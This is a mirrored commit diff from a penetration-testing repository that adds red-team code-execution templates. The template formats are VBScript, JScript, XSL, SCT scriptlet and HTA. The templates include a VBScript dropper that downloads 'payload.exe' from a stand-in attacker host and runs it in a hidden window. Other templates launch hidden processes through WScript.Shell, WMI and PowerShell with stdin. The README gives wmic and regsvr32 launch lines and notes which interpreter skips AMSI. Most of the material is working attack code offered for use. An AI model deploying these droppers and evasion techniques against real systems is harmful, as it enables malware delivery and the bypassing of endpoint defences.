mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-25 12:01:37 +01:00
Added code-exec-templates
This commit is contained in:
parent
ce933bb1c5
commit
8e976e7cee
@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf
|
|||||||
|
|
||||||
- **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
|
- **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
|
||||||
|
|
||||||
|
- [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS)
|
||||||
|
|
||||||
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
||||||
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
|
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
|
||||||
|
|
||||||
|
57
red-teaming/code-exec-templates/README.md
Normal file
57
red-teaming/code-exec-templates/README.md
Normal file
@ -0,0 +1,57 @@
|
|||||||
|
### A small collection of unobfuscated code-execution primitives in different languages
|
||||||
|
|
||||||
|
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
|
||||||
|
|
||||||
|
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
|
||||||
|
|
||||||
|
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
|
||||||
|
|
||||||
|
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
|
||||||
|
|
||||||
|
|
||||||
|
#### VBScript
|
||||||
|
|
||||||
|
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
||||||
|
|
||||||
|
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
||||||
|
|
||||||
|
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
||||||
|
|
||||||
|
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
|
||||||
|
|
||||||
|
|
||||||
|
#### JScript
|
||||||
|
|
||||||
|
|
||||||
|
#### XSL
|
||||||
|
|
||||||
|
XSL files can be executed in the following ways:
|
||||||
|
|
||||||
|
- Using `wmic.exe`:
|
||||||
|
```
|
||||||
|
wmic os get /format:"jscript-xslt-template.xsl"
|
||||||
|
```
|
||||||
|
|
||||||
|
Templates:
|
||||||
|
|
||||||
|
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
|
||||||
|
|
||||||
|
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#### COM Scriptlets
|
||||||
|
|
||||||
|
Sample code execution with `regsvr32` can be following:
|
||||||
|
```
|
||||||
|
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
|
||||||
|
```
|
||||||
|
|
||||||
|
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
|
||||||
|
|
||||||
|
|
||||||
|
#### HTA
|
||||||
|
|
||||||
|
HTA files are HTML Applications
|
||||||
|
|
||||||
|
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_
|
38
red-teaming/code-exec-templates/download-file-and-exec.vbs
Normal file
38
red-teaming/code-exec-templates/download-file-and-exec.vbs
Normal file
@ -0,0 +1,38 @@
|
|||||||
|
'
|
||||||
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
|
' local filesystem and then launching.
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
downloadURL = "http://attacker/payload.exe"
|
||||||
|
saveAs = "%TEMP%\foo.exe"
|
||||||
|
parameters = ""
|
||||||
|
|
||||||
|
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||||
|
out = sh.ExpandEnvironmentStrings(saveAs)
|
||||||
|
|
||||||
|
' STEP 1: Download File
|
||||||
|
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
|
||||||
|
xhr.Open "GET", downloadURL, False
|
||||||
|
xhr.Send
|
||||||
|
|
||||||
|
' STEP 2: Save binary file
|
||||||
|
If xhr.Status = 200 Then
|
||||||
|
With CreateObject("Adodb.Stream")
|
||||||
|
.Open
|
||||||
|
.Type = 1
|
||||||
|
.write xhr.responseBody
|
||||||
|
.savetofile out, 2
|
||||||
|
End With
|
||||||
|
|
||||||
|
' STEP 3: Execute file
|
||||||
|
cmd = out & " " & parameters
|
||||||
|
MsgBox cmd
|
||||||
|
sh.Run cmd, 0, False
|
||||||
|
|
||||||
|
End If
|
||||||
|
|
||||||
|
Set sh = Nothing
|
||||||
|
Set xhr = Nothing
|
15
red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
Normal file
15
red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
<?xml version='1.0'?>
|
||||||
|
<stylesheet
|
||||||
|
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||||
|
xmlns:user="placeholder"
|
||||||
|
version="1.0">
|
||||||
|
<output method="text"/>
|
||||||
|
<ms:script implements-prefix="user" language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
// Hello world
|
||||||
|
var shell = new ActiveXObject("WScript.Shell");
|
||||||
|
shell.Popup("Hello world from JScript XSL!");
|
||||||
|
|
||||||
|
]]> </ms:script>
|
||||||
|
</stylesheet>
|
20
red-teaming/code-exec-templates/wmi-exec-command.vbs
Normal file
20
red-teaming/code-exec-templates/wmi-exec-command.vbs
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
'
|
||||||
|
' This script uses WMI class' Win32_Process static method Create to
|
||||||
|
' execute given command in a hidden window (ShowWindow = 12).
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
command = "notepad.exe"
|
||||||
|
computer = "."
|
||||||
|
|
||||||
|
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||||
|
& computer & "\root\cimv2")
|
||||||
|
|
||||||
|
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||||
|
Set conf = startup.SpawnInstance_
|
||||||
|
conf.ShowWindow = 12
|
||||||
|
|
||||||
|
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||||
|
proc.Create command, Null, conf, intProcessID
|
13
red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
Normal file
13
red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
'
|
||||||
|
' This script uses classic WScript.Shell Run method to
|
||||||
|
' execute given command in a hidden window (second param = 0)
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
command = "notepad.exe"
|
||||||
|
|
||||||
|
With CreateObject("WScript.Shell")
|
||||||
|
.Run command, 0, False
|
||||||
|
End With
|
@ -0,0 +1,15 @@
|
|||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
<registration
|
||||||
|
progid="Foo"
|
||||||
|
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
var command = "notepad.exe";
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
</registration>
|
||||||
|
</scriptlet>
|
@ -0,0 +1,14 @@
|
|||||||
|
<?xml version='1.0'?>
|
||||||
|
<stylesheet
|
||||||
|
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||||
|
xmlns:user="placeholder"
|
||||||
|
version="1.0">
|
||||||
|
<output method="text"/>
|
||||||
|
<ms:script implements-prefix="user" language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
var command = "notepad";
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||||
|
|
||||||
|
]]> </ms:script>
|
||||||
|
</stylesheet>
|
@ -0,0 +1,14 @@
|
|||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<script language="VBScript">
|
||||||
|
Sub foo
|
||||||
|
command = "notepad.exe"
|
||||||
|
Set objShell = CreateObject("Wscript.Shell")
|
||||||
|
objShell.Run command
|
||||||
|
End Sub
|
||||||
|
foo()
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
</body>
|
||||||
|
</html>
|
@ -0,0 +1,19 @@
|
|||||||
|
'
|
||||||
|
' This script uses classic WScript.Shell Exec method to
|
||||||
|
' execute given command in a hidden window via StdIn passed to a dedicated
|
||||||
|
' launcher command (powershell.exe in this example).
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
command = "notepad.exe"
|
||||||
|
launcher = "powershell -nop -w hid -Command -"
|
||||||
|
|
||||||
|
With CreateObject("WScript.Shell")
|
||||||
|
With .Exec(launcher)
|
||||||
|
.StdIn.WriteLine command
|
||||||
|
.StdIn.WriteBlankLines 1
|
||||||
|
.Terminate
|
||||||
|
End With
|
||||||
|
End With
|
Loading…
Reference in New Issue
Block a user